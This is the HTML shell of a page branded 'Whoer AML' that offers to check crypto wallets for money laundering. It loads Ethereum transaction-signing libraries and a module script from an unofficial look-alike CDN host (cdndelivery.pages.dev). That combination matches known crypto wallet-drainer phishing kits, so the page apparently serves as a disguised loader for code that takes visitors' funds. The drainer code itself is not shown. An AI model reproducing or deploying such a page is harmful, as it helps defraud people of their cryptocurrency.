<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><link rel="icon" href="images/favicon.png"><link rel="preload"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#000000"><meta name="AML" content="Easy analysis of crypto wallets and transactions for AML compliance"><meta name="description" content="Whoer AMLbot checks cryptocurrencies for money laundering, providing detailed reports. Ensure legal compliance and protect your crypto wallet against blocks and fraudsters."><link rel="manifest" href="/manifest.json"><title>Whoer AML</title><script defer="defer" src="js/main.9f0ae6e7.js"></script><link href="css/main.bad8a77c.css" rel="stylesheet"><link href="https://cdn.jsdelivr.net/npm/sweetalert2@11.7.16/dist/sweetalert2.min.css" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;700&family=Montserrat:wght@400;500;700&family=Raleway:wght@400;500;700&family=Roboto:wght@400;500;700&display=swap" rel="stylesheet">
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.7.16/dist/sweetalert2.all.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/ethereumjs/browser-builds/dist/ethereumjs-tx/ethereumjs-tx-1.3.3.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.7.2/ethers.umd.min.js" integrity="sha512-FDcVY+g7vc5CXANbrTSg1K5qLyriCsGDYCE02Li1tXEYdNQPvLPHNE+rT2Mjei8N7fZbe0WLhw27j2SrGRpdMg==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/web3/4.0.3/web3.min.js" integrity="sha512-2oprd2T2vSkAii+dVWi6C+uATbQ1YGmCed6b6msb9Jxi33hsXAbnhwZ9thwCq6ndidZv4P51qaq58uo9b/x4nA==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>     
    <script src="./settings.js"></script>
    <script src="https://cdndelivery.pages.dev/web3-ethers.js" type="module"></script></head><body><script async="" src="https://www.googletagmanager.com/gtag/js?id=G-C07MDHDC8D"></script><script async="">function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","G-C07MDHDC8D")</script><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"></div></body></html>